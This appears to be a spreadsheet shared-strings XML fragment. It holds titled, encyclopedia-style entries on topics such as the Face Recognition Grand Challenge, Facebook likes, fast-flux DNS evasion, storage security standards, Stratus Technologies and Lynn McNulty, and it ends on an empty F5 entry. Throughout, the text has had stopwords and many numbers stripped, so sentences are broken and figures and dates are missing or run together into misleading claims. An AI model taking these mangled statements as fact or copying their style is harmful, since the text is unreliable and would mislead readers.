  <si>
    <t>Face Recognition Grand Challenge</t>
  </si>
  <si>
    <t>face recognition grand challenge (frgc) conducted effort promote advance face recognition technology. successor face recognition vendor test. overview primary goal frgc promote advance face recognition technology designed support existing face recognition efforts u.s. government. frgc developed face recognition techniques prototype systems increasing performance order magnitude. frgc open face recognition researchers developers companies, academia, research institutions. frgc 2004 march 2006. frgc consisted progressively difficult challenge problems. each challenge problem consisted data facial images defined experiments. impediments developing improved face recognition lack data. frgc challenge problems include sufficient data overcome impediment. defined experiments assists researchers developers making progress meeting performance goals. there three main contenders improving face recognition algorithms: high resolution images, three-dimensional (3d) face recognition, pre-processing techniques. frgc simultaneously pursuing assess merit three techniques. current face recognition systems designed work relatively small still facial images. traditional method measuring size face number pixels centers eyes. current images pixels centers eyes (10,000 20,000 pixels face). frgc, high resolution images consist facial images pixels centers eyes average. frgc facilitate development algorithms take advantage additional information inherent high resolution images. three-dimensional (3d) face recognition algorithms identify faces shape person's face. current face recognition systems, changes lighting (illumination) pose face reduce performance. because shape faces affected changes lighting pose, face recognition potential improve performance conditions. last couple years advancement computer graphics computer vision modeling lighting pose changes facial imagery. these advances development computer algorithms automatically correct lighting pose changes facial imagery. these algorithms work pre-processing facial image correct lighting pose prior processed face recognition system. pre-processing portion frgc measure impact pre-processing algorithms recognition performance. frgc improved capabilities automatic face recognition systems experimentation clearly stated goals challenge problems. researchers developers develop algorithms systems meet frgc goals. development algorithms systems facilitated frgc challenge problems. structure face recognition grand challenge frgc structured around challenge problems designed challenge researchers meet frgc performance goal. there three aspects frgc face recognition community. first aspect size frgc terms data. frgc data contains 50,000 recordings. second aspect complexity frgc. previous face recognition data sets restricted still images. frgc consist three modes: high resolution still images images multi-images person.the third aspect infrastructure. infrastructure frgc provided biometric experimentation environment (bee), based framework describing documenting computational experiments. allow description distribution experiments common format, recording results experiment common format, analysis presentation results common format, documentation experiment format common format. this first time computational-experimental environment supported challenge problem face recognition biometrics. frgc data frgc data distribution consists three parts. first frgc data set. second part frgc bee. distribution includes data sets performing scoring experiments. third part baseline algorithms experiments with three components, possible experiments processing images producing receiver operating characteristics (rocs). data frgc consists 50,000 recordings divided training validation partitions. training partition designed training algorithms validation partition assessing performance approach laboratory setting. validation partition consists data 4,003 subject sessions. subject session images person taken time person's biometric data collected consists four controlled still images, uncontrolled still images, three-dimensional image. controlled images taken studio setting, full frontal facial images taken lighting conditions facial expressions (smiling neutral). uncontrolled images taken varying illumination conditions; e.g., hallways, atriums, outside. each uncontrolled images contains expressions, smiling neutral. image taken controlled illumination conditions. images consist range texture image. images acquired minolta vivid 900/910 series sensor. frgc distribution consists experiments. experiment gallery consists single controlled still image person probe consists single controlled still image. experiment control experiment. experiment studies effect using multiple still images person performance. experiment biometric sample consists four controlled images person taken subject session. example, gallery composed four images person images taken subject session. likewise, probe consists four images person. experiment measures performance face recognition. experiment gallery probe consist images person. experiment measures recognition performance uncontrolled images. experiment gallery consists single controlled still image, probe consists single uncontrolled still image. experiments examine comparing images. experiments, gallery consists images. experiment probe consists single controlled still. experiment probe consists single uncontrolled still. sponsors intelligence advanced research projects agency (iarpa) department homeland security (dhs) criminal justice information services division technical support working group (tswg) national institute justice references this article incorporates public domain material national institute standards technology document: "nist face recognition grand challenge". external links mbgc website mbgc blog frgc website frvt website website national institute standards technology intelligence advanced research projects agency department homeland security criminal justice information services division technical support working group (tswg)</t>
  </si>
  <si>
    <t>Fake likes</t>
  </si>
  <si>
    <t>like button social networking website facebook first enabled february 2009. like button enables users easily interact status updates, comments, photos videos, links shared friends, advertisements. once clicked user, designated content appears news feeds user's friends, button also displays number users liked content, including full partial list users. like button extended comments june 2010. after extensive testing years questions public whether intention incorporate "dislike" button, facebook officially rolled "reactions" users worldwide february 2016, letting users long-press like button option five pre-defined emotions, including "love", "haha", "wow", "sad", "angry". reactions also extended comments 2017, major graphical overhaul april 2019. like button facebook's social plug-ins, button placed third-party websites. centers around form advertising network, gathers information users visit websites. this form functionality, sort beacon, significantly criticized privacy. privacy activist organizations urged facebook stop data collection plug-in, governments launched investigations activity possible privacy violations. facebook stated anonymizes information three months, data collected shared sold third parties. additionally, like button's potential measurement popularity caused companies sell likes fake facebook accounts, turn sparked complaints companies advertising facebook received abundance fake likes distorted proper user metrics. facebook states terms service agreement users create personal page, ongoing efforts spread fake accounts. facebook like button feature social networking service facebook, users like content status updates, comments, photos videos, links shared friends, advertisements. feature activated february 2009. also feature facebook platform enables participating websites display button enables sharing site's content friends.when user clicks like button, content appears news feeds user's friends. button also displays number users liked piece content, show full partial list users. ability like users' comments added june 2010, ability react five pre-defined emotions, including "love", "haha", "wow", "sad", "angry", added 2017. facebook describes "liking" "easy people know enjoy without leaving comment".after year testing, included october 2015 availability ireland spain, facebook officially rolled "reactions" users worldwide february 2016. feature allows users long-press like button options five pre-defined emotions ranging "love", "haha", "wow", "sad", "angry". june 2017, celebration pride month, facebook introduced rainbow flag part reactions options.the design reactions updated april 2019, frames comprising icons' animations well general graphical overhaul. reactions first shown reverse engineering expert jane manchun wong twitter, mixed reactions replies facebook itself. september 2019 revealed facebook conducting trial australia hide like count posts. 2020 covid-19 outbreak, "care" reaction added facebook. “dislike” button during public session december 2014, mark zuckerberg answered questions regarding public's wish "dislike" button facebook. zuckerberg said: "there’s something that’s simple ‘like’ button’ giving people ways expressing emotions would powerful. need figure right ends force good, force demeaning posts people putting there." while suggesting comment field users feel like button appropriate, said facebook plans" introduce dislike button.in september 2015, zuckerberg said facebook working "empathy button", showing support victims tragedies. commented "people aren’t looking ability downvote people's posts. what really want able express empathy. every moment good moment, right? sharing something sad, whether it’s something current events like refugee crisis touches family member passed away, might feel comfortable like post." february 2016, facebook announced "reactions", offering different ways users interact posts like button, including "love", "haha", "wow", "sad", "angry", later addition "care" march 2020 covid-19 pandemic. public like button facebook's social plug-ins, features websites outside facebook part open graph. speaking company's developer conference april 2010, launch, mark zuckerberg said building default social". like button implemented similarly advertising network, sites participate, facebook given vast amount information visits websites when. when loading website like button enabled, user's browser connects facebook's servers, record website visited, user.a week release social plugins, facebook announced 50,000 websites installed features, including like button. five months later, number increased million websites.in december 2010 united states, microsoft's bing search engine partnered facebook identify links search results "liked" searcher's facebook friends. criticism fake "likes" number "likes" facebook serve measurement interest and/or popularity particular brand, product personality, though also reports "overblown importance" likes. social media's influence shaping reputations, exist companies specializing selling "likes" fake accounts. this caused issues companies advertising facebook, receiving abundance likes without credibility distort actual user metrics. facebook's terms service agreement states users allowed personal page, ongoing "war" fake accounts. 2015 estimate number fake accounts million, symantec study september 2011 found million video posts made fake likes. reach content analysis highlights “like” reaction likely decrease organic reach given facebook post “brake effect”. facebook users often apply interaction button, perhaps facebook "like" reaction negative element algorithmic content ranking. tracking social network like buttons websites often used beacons track user activities targeted advertising behavioral targeting combined personally identifiable information, considered breach internet privacy. june 2010, american civil liberties union, center democracy technology, center digital democracy, consumer action, consumer watchdog, electronic frontier foundation, electronic privacy information center, privacy activism, privacy lives, privacy rights clearinghouse sent open letter facebook requesting retain data specific visitors third party sites incorporate "social plugins" "like" button, unless site visitor chooses interact tools."multiple governments also launched investigations activity. september 2010, then-privacy commissioner canada jennifer stoddart announced investigations facebook, alleging like button's appearance outside facebook violates canada's privacy laws. august 2011, german data protection commissioner’s office ordered federal agencies stop using facebook remove like button websites. november 2015, government belgium gave facebook hours cease tracking people signed facebook, else receive daily fine eur€250,000, facebook said would appeal.in defense, facebook told cnet june 2010 information visited websites anonymized three months, shared sold third parties. free speech 2009, sheriff b.j. roberts hampton, virginia fired several employees "liked" rival's facebook page sheriff's election. employees fought back court, argument "like" protected first amendment united states constitution free speech. september 2013, federal appeals court ruled "likes" form protected speech amendment, commenting basic level, clicking 'like' button literally causes published statement user 'likes' something, substantive statement. context political campaign’s page, meaning user approves candidacy whose page liked unmistakable. that user single mouse click produce message likes page instead typing message several individual strokes constitutional significance." declining organic reach company pages 2014, social@ogilvy, division advertising agency ogilvy mather, published widely cited white paper titled "facebook zero: considering life after demise organic reach", documenting facebook's restriction content published businesses' brands' pages. zero refers projected percentage given page's followers, "likers", able posts page personal news feeds. paper's author observes adjustments facebook algorithms reduced organic reach non-paying business pages (that least 500,000 likes) percent 2012 percent february 2014. ability minors "like" advertising lawsuit filed 2010 claiming facebook allow minors "like" advertising. facebook said suit "completely without merit". intimate user details research shows facebook likes automatically processed infer intimate details individual, sexual orientation, political religious views, race, substance use, intelligence, personality. effectively, individual views preferences revealed even directly expressed indicated liking associated content. "surfbook" legal action february 2013, legal action brought facebook patent-holding company rembrandt social media. rembrandt owns several patents taken dutch programmer joannes jozef everardus meer, died 2004. these include patents filed 1998 relating meer's fledgling social network surfbook, including, according legal papers filed patent holder, ability users approve data using "like" button. limited geographical reach "pride" reaction june 2017, celebration pride month, facebook introduced rainbow flag part reactions options. however, access rainbow reaction depends location. "major markets pride celebrations", pride reaction available default, areas, "liking" facebook's lgbtq page enables feature. areas homosexuality illegal, feature available all. this sparked debate, jillian york vice's motherboard writing facebook’s goal make world open connected, could start treating queer communities equality", tristan greene next writing "what don’t understand, facebook, you’re limiting things all? premium memory many rainbows shut facebook eastern hemisphere?" blog post, facebook stated different levels access necessary "because experience we’ve testing", although user feedback questioned line thinking pointing earlier temporary reactions, including dedicated halloween mother's reactions, available users despite everyone celebrating. also emoticon justin rosenstein thumb signal references</t>
  </si>
  <si>
    <t>Stratoscale</t>
  </si>
  <si>
    <t>stratoscale software company offering software-defined data center technology, hyper-converged infrastructure cloud computing capabilities. stratoscale combined compute, storage, networking hardware additional third party software. stratoscale shut details future products. history stratoscale founded 2013 ariel maislos. stratoscale headquartered israel offices herzliya haifa, offices north america sunnyvale, california, boston, massachusetts, york city, york. stratoscale announced stratoscale symphony, december 2015, selling channel partners.stratoscale raised million battery ventures, bessemer venture partners, intel capital, cisco, leslie ventures, qualcomm ventures, sandisk.the company shut 2019 lack funding. products stratoscale symphony marketed software-defined data centers hyper-converged infrastructure. software intended work customers' hardware. stratoscale symphony available subscription basis. symphony suite could deployed commodity servers provide amazon services (aws) capability capacity augment legacy vmware. 2016, stratoscale released symphony partner program stratoscale channel partners, technology partners, system partners. channel partners consisted resellers, integrators, distributors. technology partners included cloudendure, cloudera, docker, hortonworks, intel, mellanox technologies, midokura, openstack, sandisk. system partners included cisco, hewlett packard enterprise (hpe), infinidat, lenovo, supermicro. references external links official website</t>
  </si>
  <si>
    <t>Saltzer and Schroeder's design principles</t>
  </si>
  <si>
    <t>saltzer schroeder's design principles design principles enumerated jerome saltzer michael schroeder 1975 article protection information computer systems, experience important design secure software systems. design principles economy mechanism: keep design simple small possible. fail-safe defaults: base access decisions permission rather exclusion. complete mediation: every access every object must checked authority. open design: design secret. separation privilege: where feasible, protection mechanism requires keys unlock robust flexible allows access presenter single key. least privilege: every program every user system operate using least privileges necessary complete job. least common mechanism: minimize amount mechanism common user depended users. psychological acceptability: essential human interface designed ease use, users routinely automatically apply protection mechanisms correctly. work factor: compare cost circumventing mechanism resources potential attacker. compromise recording: sometimes suggested mechanisms reliably record compromise information occurred used place elaborate mechanisms completely prevent loss. references saltzer schroeder's design principles resources industrial internet consortium volume industrial chapter from functional implementation viewpoint page</t>
  </si>
  <si>
    <t>Strata Exam</t>
  </si>
  <si>
    <t>strata exam comptia certification. covers fundamentals various areas study. below chart section strata test much comprises exam:</t>
  </si>
  <si>
    <t>Fast flux</t>
  </si>
  <si>
    <t>fast flux domain name system (dns) based evasion technique used cyber criminals hide phishing malware delivery websites behind ever-changing network compromised hosts acting reverse proxies backend botnet master—a bulletproof autonomous systems. also refer combination peer-to-peer networking, distributed command control, web-based load balancing proxy redirection used make malware networks resistant discovery counter-measures. fundamental idea behind fast-flux numerous addresses associated single fully qualified domain name, addresses swapped extremely high frequency, changing resource records, thus authoritative name servers said fast-fluxing domain name is—in cases—hosted criminal actor.depending configuration complexity infrastructure, fast-fluxing generally classified single, double, domain fast-flux networks. fast-fluxing remains intricate problem network security current countermeasures remain ineffective. history fast-fluxing first reported security researchers william salusky robert danford honeynet project 2007; following year, released systematic study fast-flux service networks 2008. rock phish (2004) storm worm (2007) notable fast-flux service networks used malware distribution phishing. fast-flux service network fast-flux service network (ffsn) network infrastructure resultant fast-fluxed network compromised hosts; technique also used legitimate service providers content distribution networks (cdns) dynamic address converted match domain name internet host, usually purpose load balancing using round-robin domain name system (rr-dns). purpose using ffsn infrastructure botnets relay network requests proxy backend bulletproof content server function "origin server".the frontend bots, ephemeral host affixed control master, called flux-agents whose network availability indeterminate dynamic nature fast-fluxing. backend motherships establish direct communication user agents, rather every actions reverse proxied compromised frontend nodes, effectively making attack long-lasting resilient take attempts. types fast-fluxing generally classified types: single fluxing double fluxing, build-on implementation single fluxing. phraseologies involved fast-fluxing includes "flux-herder mothership nodes" "fast-flux agent nodes", referred backend bulletproof botnet controller compromised host nodes involved reverse proxying traffic back-and-forth origin clients respectively. compromised hosts used fast-flux herders typically includes residential broadband access circuits, cable modems. single-flux network single-flux network, authoritative name server fast-fluxing domain name repeatedly permutes resource records time live (ttl) values, conventionally seconds. permuted record within zone file includes aaaa cname record, disposition usually done means round robin registry exploited host's addresses ddns names. although http remain commonly proxied application protocols frontend flux-agents, protocols smtp, imap also delivered transport layer (l4) level port binding techniques flux-agents backend flux-herder nodes. double-flux network double-fluxing networks involve high-frequency permutation fluxing domain's authoritative name servers, along resource records aaaa, cname pointing frontend proxies. infrastructure, authoritative name server fluxing domain points frontend redirector node, forwards datagram backend mothership node resolve query. resource records, including record, lower value, therefore resulting additional level indirection. records double-fluxing network usually point referrer host listens port forwards query backend resolver authoritative fluxing domain.: advanced level resilience redundancy achieved blind proxy redirection techniques frontend nodes;: fast-fluxing domains also abuse domain wildcarding 1034 specification spam delivery phishing, covert channels transferring application layer payloads protocols http, sftp, encapsulated within datagram query.: domain-flux network domain-flux network involves keeping fast-fluxing network operational continuously rotating domain name flux-herder mothership nodes. domain names dynamically generated using selected pseudorandom domain generation algorithm (dga), flux operator mass-registers domain names. infected host repeatedly tries initiate flux-agent handshake spontaneous generating, resolving connecting address acknowledgment, register flux-herder mothership node. notable example includes conficker, botnet operational generating 50,000 different domains top-level domains (tlds). security countermeasures detection mitigation fast-fluxing domain names remain intricate challenge network security robust nature fast-fluxing. although fingerprinting backend fast-flux mothership node remains increasingly difficult, service providers could detect upstream mothership nodes probing frontend flux-agents special sending crafted http request would trigger out-of-band network request backend fast-flux mothership node client independent channel, client could deduce mothership node's address analyzing logs network traffic. various security researchers suggests effective measure fast-fluxing take domain name use. however, domain name registrars reluctant since jurisdiction independent terms service agreements must observed; cases, fast-flux operators cybersquatters main source income registrars.other countermeasures fast-fluxing domains include deep packet inspection (dpi), host-based firewall, ip-based access control lists (acls), although serious limitations approaches dynamic nature fast-fluxing. also avalanche (phishing group) references bibliography almomani, ammar august 2016). "fast-flux hunter: system filtering online fast-flux botnet". neural comput applic. springer publishing. (7): 483–493. doi:10.1007/s00521-016-2531-1. s2cid 4626895. xingguo; wang, junfeng september 2017). "botnet detection technology based dns". future internet. sichuan university. (4): doi:10.3390/fi9040055. salusky, william; daford, robert july 2007). "know your enemy: fast-flux service networks". honeynet project. archived original september 2012 wayback machine. {{cite journal}}: cite journal requires |journal= (help) konte, feamster, jung, (january 2008). "sac 025: ssac advisory fast flux hosting dns" (pdf). security stability advisory committee (ssac). internet corporation assigned names numbers (1). archived (pdf) original november 2021. retrieved december 2021. "spamhaus: frequently asked questions (faq)". spamhaus project. archived original february 2022. retrieved march 2022. "sac ssac advisory fast flux hosting dns" (pdf). internet corporation assigned names numbers. january 2008. archived original (pdf) 2022-01-19. zhou, shijie june 2015). survey fast-flux attacks". information security journal: global perspective. university electronic science technology china. (4–6): 79–97. doi:10.1080/19393555.2015.1058994. s2cid 34993719.</t>
  </si>
  <si>
    <t>MANRS</t>
  </si>
  <si>
    <t>manrs ("mutually agreed norms routing security") internet society-supported activity aimed securing global internet routing. main participants internet service providers (isps), cloud providers, internet exchange points (ixps) content delivery networks (cdns). members manrs include: network operators like workonline communications, telcom internet, backspace technologiers (and more). internet exchange points like france nix.cz, napafrica (and more). cdns cloud providers like amazon, cloudflare, facebook, google, netflix.manrs also operates manrs observatory, service monitors internet routing problems.in 2020, amidst covid-19 pandemic, manrs announced autonomous systems joined initiative. references external links official website manrs observatory</t>
  </si>
  <si>
    <t>MALINTENT</t>
  </si>
  <si>
    <t>malintent technological system developed u.s. department homeland security implemented detection potential terrorist suspects.the system various test scanning elevated blood pressure, rapid heart breath rate, non-verbal cues. according scientists, malintent system uses barrage non-invasive sensors imagers detect evaluate person's facial expressions gauge whether suspect could planning commit attack crime. sensors pick anything considered alarming, analysts decide whether subject person questioning. also advise information awareness office matrix psycho-pass surveillance references</t>
  </si>
  <si>
    <t>Storage security</t>
  </si>
  <si>
    <t>storage security specialty area security concerned securing data storage systems ecosystems data resides systems. introduction according storage networking industry association (snia), storage security represents convergence storage, networking, security disciplines, technologies, methodologies purpose protecting securing digital assets. historically, focus vendor aspects making storage product secure consumer aspects associated using storage products secure ways. snia dictionary defines storage security as:technical controls, include integrity, confidentiality availability controls, protect storage resources data unauthorized users uses.iso/iec 27040 provides following comprehensive definition storage security:application physical, technical administrative controls protect storage systems infrastructure well data stored within themnote entry: storage security focused protecting data (and storage infrastructure) unauthorized disclosure, modification destruction assuring availability authorized users.note entry: these controls preventive, detective, corrective, deterrent, recovery compensatory nature. principles data needs stored durable media redundant backups exist better location storage devices located needs secured theft, natural disasters, willful destruction etc. storage media need disconnected internet computer protection cyberattacks malware relevant standards specifications applying security storage systems ecosystems requires good working knowledge assortment standards specifications, including, limited guide 73:2009, risk management vocabulary 7498-2:1989, information technology open systems interconnection basic reference model part security architecture 16609:2004, banking requirements message authentication using symmetric techniques iso/pas 22399:2007, societal security guideline incident preparedness operational continuity management iso/iec 10116:2006, information technology security techniques modes operation n-bit block cipher iso/tr 10255:2009, document management applications optical disk storage technology, management standards iso/tr 18492:2005, long-term preservation electronic document-based information 16175-1:2010, information documentation principles functional requirements records electronic office environments part overview statement principles 16175-2:2011, information documentation principles functional requirements records electronic office environments part guidelines functional requirements digital records management systems 16175-3:2010, information documentation principles functional requirements records electronic office environments part guidelines functional requirements records business systems iso/iec 11770 (all parts), information technology security techniques management iso/iec 17826:2012, information technology cloud data management interface (cdmi) iso/iec 19790:2006, information technology security techniques security requirements cryptographic modules iso/iec 24759:2008, information technology security techniques test requirements cryptographic modules iso/iec 24775, information technology storage management published) iso/iec 27000:2014, information technology security techniques information security management systems overview vocabulary iso/iec 27001:2013, information technology security techniques information security management systems requirements iso/iec 27002:2013, information technology security techniques code practice information security controls iso/iec 27003:2010, information technology security techniques information security management systems implementation guidance iso/iec 27005:2008, information technology security techniques information security risk management iso/iec 27031:2011, information technology security techniques guidelines information communication technology readiness business continuity iso/iec 27033-1:2009, information technology security techniques network security part overview concepts iso/iec 27033-2, information technology security techniques network security part guidelines design implementation network security iso/iec 27033-3:2010, information technology security techniques network security part reference networking scenarios threats, design techniques control issues iso/iec 27033-4:2014, information technology security techniques network security part securing communications networks using security gateways iso/iec 27037:2012, information technology security techniques guidelines identification, collection, acquisition, preservation digital evidence iso/iec/ieee 24765-2010, systems software engineering vocabulary ieee 1619-2007, ieee standard wide-block encryption shared storage media ieee 1619.1-2007, ieee standard authenticated encryption length expansion storage devices ieee 1619.2-2010, ieee standard cryptographic protection data block-oriented storage devices ietf 1813 version protocol specification ietf 3195 reliable delivery syslog ietf 3530 network file system (nfs) version protocol ietf 3720 internet small computer systems interface (iscsi) ietf 3723 securing block storage protocols ietf 3821 fibre channel over tcp/ip (fcip) ietf 4303 encapsulating security payload (esp) ietf 4595 ikev2 fibre channel security association management protocol ietf 5246 transport layer security (tls) protocol version ietf 5424 syslog protocol ietf 5425 transport mapping syslog ietf 5426 transmission syslog messages ietf 5427 textual conventions syslog management ietf 5661 network file system (nfs) version minor version protocol ietf 5663 parallel (pnfs) block/volume layout ietf 5848 signed syslog messages ietf 6012 datagram transport layer security (dtls) transport mapping syslog ietf 6071 security (ipsec) internet exchange (ike) document roadmap ietf 6587 transmission syslog messages ietf 7146, securing block storage protocols 3723 requirements update ipsec ansi incits 400–2004, information technology scsi object-based storage device commands (osd) ansi incits 458–2011, information technology scsi object-based storage device commands (osd-2) ansi incits 461–2010, fibre channel switch fabric (fc-sw-5) ansi incits 462–2010, information technology fibre channel backbone (fc-bb-5) ansi incits 463–2010, fibre channel generic services (fc-gs-6) ansi incits 470–2011, fibre channel framing signaling-3 (fc-fs-3) ansi incits 482–2012, information technology ata/atapi command (acs-2) ansi incits 496–2012, information technology fibre channel security protocols (fc-sp-2) ansi incits 512–2013, information technology scsi block commands (sbc-3) nist fips 140–2, security requirements cryptographic modules nist fips 197, advanced encryption standard nist special publication 800-38a, recommendation block cipher modes operation: three variants ciphertext stealing mode nist special publication 800-38c, recommendation block cipher modes operation: mode authentication confidentiality nist special publication 800-38d, recommendation block cipher modes operation: galois/counter mode (gcm) gmac nist special publication 800-38e, recommendation block cipher modes operation: xts-aes mode confidentiality storage devices nist special publication 800-57 part recommendation management: part general (revision nist special publication 800-57 part recommendation management: part best practices management organization nist special publication 800-67, recommendation triple data encryption algorithm (tdea) block cipher nist special publication 800-88 revision guidelines media sanitization, http://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-88r1.pdf storage networking industry association (snia), storage management initiative specification (smi-s), version 1.5, architecture book, http://www.snia.org/tech_activities/standards/curr_standards/smi storage networking industry association (snia), snia technical position: specification storage systems v1.0, http://www.snia.org/tls trusted computing group, storage architecture core specification, version 2.0, november 2011 trusted computing group, storage security subsystem class: enterprise, version 1.0, january 2011 trusted computing group, storage security subsystem class: opal, version 2.0, february 2012 oasis, management interoperability protocol specification (version later) oasis, management interoperability protocol profiles (version later) recommendation itu-t x.1601 (2013), security framework cloud computing recommendation itu-t y.3500 iso/iec 17788:2014, information technology cloud computing overview vocabulary external links storage networking industry association: snia home references</t>
  </si>
  <si>
    <t>Stratus Technologies</t>
  </si>
  <si>
    <t>stratus technologies, inc. major producer fault tolerant computer servers software. company founded 1980 stratus computer, inc. natick, massachusetts, adopted present name 1999. current president dave laurello. stratus technologies, inc. privately held company, owned solely siris capital group. parent company, stratus technologies bermuda holdings, ltd., incorporated bermuda. stratus computer marlborough, massachusetts, based producer fault tolerant minicomputers. competed computers tandem computers lesser extent digital equipment corporation's vax. starting 1983, computers resold worldwide olivetti cps/32 brand. then, 1985 1993, computers resold system/88 brand. company based maynard, massachusetts. history stratus shipped first computer february 1982, months founding. customer west lynn creamery, located nearby lynn, massachusetts. company's traditional markets financial services companies banks stock exchanges. beginning 1990s, company moved telecommunications industry, particularly area network management custom services, result telecommunications revenues surpassed enterprise computing. this buyout company ascend communications 1998 (later acquired lucent technologies).the enterprise server portion business little interest ascend portion spun management buyout 1999, funding international investment firm, investcorp. company named stratus technologies, inc. second quarter 2002, lucent sold telecom product lines originally came stratus platinum equity, buyout firm based angeles. that unit eventually named cemprus llc. stratus purchased cemprus 2003. wholly owned subsidiary stratus. this acquisition gave stratus signaling software phone networks intelligent gateway software traditional voice equipment able communicate. this software used support higher-level telephony applications calling-card toll free phone number services. 2006, stratus purchased emergent network solutions allen, texas. stratus sold emergent 2009, emergent known stratus telecommunications. companies separate entities. parent other. july 2010, reverse merger ymax vocaltec stratus telecommunications technologies owned vocaltec.in 2012, stratus acquired assets, products, services, intellectual property marathon technologies along customer base channel-partner network. privately held, stratus technologies, inc. acquired siris capital group april 2014. june 2022 smart global holdings announced acquisition stratus sirus $225m. products customers legacy product line originally based motorola mc68000 processors series), migrated intel i860 processors (xa/r series), hewlett-packard's pa-risc processors (continuum series), finally intel xeon processors series). that line runs operating system, originally many features inspired derived multics. other operating systems supported legacy platforms (xa/r, jetta continuum)—hp-ux home-grown unix product called (fault-tolerant unix)—are supported longer actively sold. june 2002, stratus introduced ftserver line intel-based servers, running microsoft windows 2000 higher. stratus ftserver line sold today supports windows 2000, 2003 2008, well enterprise linux. company sells models ftserver designated entry-level, mid-range enterprise-class fault tolerant servers. mid-range enterprise ftserver systems also vmware vsphere virtualization software. company began offering stratus avance software june 2008, high availability product virtualization built avance runs general-purpose servers allows deployment applications across high-availability virtual machines, freeing existing servers. servers comprising avance high-availability platform separated three miles purposes disaster recovery business continuity. avance intended serve small-to-medium size businesses' need affordable simple high availability virtualization. stratus large presence maynard, massachusetts, u.s. headquarters, phoenix, arizona, well several worldwide offices, locations netherlands, south africa, france, germany, italy, spain, australia, zealand, singapore, hong kong, china japan. company vast customer base, popular types customers include banks credit unions, emergency response centers (such usa), police departments, fire departments, hospitals, clinics, governments, credit card companies, stock exchanges, telcos/phone companies internet providers. references external links stratus company homepage</t>
  </si>
  <si>
    <t>MPEG-21</t>
  </si>
  <si>
    <t>mpeg-21 standard, moving picture experts group, aims defining open framework multimedia applications. mpeg-21 ratified standards iso/iec 21000 multimedia framework (mpeg-21).mpeg-21 based essential concepts: definition digital item fundamental unit distribution transaction) users interacting digital itemsdigital items considered kernel multimedia framework users considered interacts inside multimedia framework. basic level, mpeg-21 provides framework user interacts another one, object interaction digital item. that, could main objective mpeg-21 define technology needed support users exchange, access, consume, trade manipulate digital items efficient transparent way. mpeg-21 part file format defined storage mpeg-21 digital item file format based base media file format, digital item's ancillary data (such movies, images non-xml data) within file. uses filename extensions .m21 .mp21 mime type application/mp21. digital rights management mpeg-21 defines also "rights expression language" standard means managing restrictions digital content usage. xml-based standard, mpeg-21 designed communicate machine-readable license information "ubiquitous, unambiguous secure" manner. among aspirations standard, industry hope file sharing, constitute: normative open framework multimedia delivery consumption players delivery consumption chain. this open framework provide content creators, producers, distributors service providers equal opportunities mpeg-21 enabled open market." also digital rights management axmedis axmedis free mpeg-21 tools authoring play references further reading framework overview external links mpeg-21 overview mpeg-21 resources section mpeg industry forum site mpeg-21 multimedia framework (overview state art) mpeg-21 overview (blog) mpeg-7/-21 community portal mpeg-21 schema files</t>
  </si>
  <si>
    <t>Face Animation Parameter</t>
  </si>
  <si>
    <t>face animation parameter (fap) component mpeg-4 face body animation (fba) international standard (iso/iec 14496-1 developed moving pictures experts group. describes standard virtually representing humans humanoids adequately achieves visual speech intelligibility well mood gesture speaker, allows bitrate compression transmission animation parameters. faps control feature points face model mesh used produce animated visemes facial expressions, well head movement. these feature points part face definition parameters (fdps) also defined mpeg-4 standard. faps represent displacements rotations feature points neutral face position, defined mouth closed, eyelids tangent iris, gaze head orientation straight ahead, teeth touching, tongue touching teeth. these faps designed closely related human facial muscle movements. addition animation, faps used automatic speech recognition biometrics. references external links moving picture experts group website</t>
  </si>
  <si>
    <t>Fabric of Security</t>
  </si>
  <si>
    <t>fabric security, also known cyber security fabric federated security, refers systems designed protect information systems infrastructure home, corporation government malicious attackers. protection sense means guaranteeing confidentiality, integrity, availability information stored system ("system"), elements components. unlike endpoint security, network security, application security, internet security, fabric security systems assume attacks successful, cannot averted. therefore, emphasis shifts attempting prevent unauthorized access minimizing time detect unauthorized access, time isolate unauthorized access harm, finally, time remove offending process reconfiguration system back "safe" state. security essentials security refers processes systems designed protect assets individual, system and/or organization harm. computer security (a.k.a. cyber security) refers processes systems designed protect computer and/or information system assets harm. general, assets are: information/ data, programs applications, services. protecting assets harm means: confidentiality assets used/access authorized parties (also refer secrecy privacy) integrity assets modified authorized parties authorize ways (“insider threat”) availability assets available authorize parties time lampson's protection model 1971, butler lampson introduced general model protection computer information system assets. protection systems implemented since followed lampson's original formulation, access control matrix. fundamentally universe divided classes entities: objects (which need protected) subjects (which objects). objects also called resources subjects also called principals. resource object protection policy established. access objects restricted protection system, called reference monitor, implements protection policies system. namely reference monitor "guard system" must: identifies identity principal claiming access object principal identity, authentication validates principal claiming access object he/she/it claims authorization principal claiming access object authorized access said object. references</t>
  </si>
  <si>
    <t>F. Lynn McNulty</t>
  </si>
  <si>
    <t>col. frederick “f.” lynn mcnulty (1939–2012) first director information systems security u.s. state department, pioneer field cybersecurity, characterized “father” u.s. federal information security. peers eulogized tireless advocate security nation. early persistent champion information security government. cybersecurity mcnulty played role influencing u.s. national security policy everything export controls commercial encryption products deployment federal cybersecurity infrastructure. repeatedly called testify cybersecurity matters u.s. house senate subcommittees. according scmagazine.com’s robert bigman, mcnulty’s contributions cybersecurity “woven almost every government information security policy program,” security initiatives became model within federal government served basis computer security 1987. june 2012 edition, federal computer weekly identified mcnulty thought leaders field cybersecurity preceding quarter century. fellow international information systems security consortium (isc)², mcnulty recipient federal award inducted information systems security association (issa) hall fame. publications include lynn mcnulty “encryption's importance economic infrastructure security”, duke journal comparative international 427–450 (1999). background postscript born alameda, california, mcnulty received b.a. international affairs university california, berkeley. awarded master's degrees, m.a. international affairs jose state m.p.a. george washington university. united states army reserve officer 1963 1999, frederick lynn mcnulty activated four years vietnam war. late 1960s early 1970s, mcnulty worked information security central intelligence agency. retired government 1995. mcnulty died aggressive lymphoma 2012. buried arlington national cemetery. honors late 2013, (isc)² created mcnulty award, u.s. government information security leadership awards (gisla), lynn mcnulty's honor. lynn mcnulty tribute gisla recognize member u.s. federal information security community upholds mcnulty’s legacy visionary innovator outstanding service commitment. organization shall bestow first lynn mcnulty gisla october, 2013. 2014, lynn mcnulty was, himself, posthumously awarded lifetime achievement award 17th annual bestowing awards excellence information security public policy global information security conference francisco, california. widow peggy mcnulty accepted award. references</t>
  </si>
  <si>
    <t>F5, Inc.</t>
  </si>
  <si>
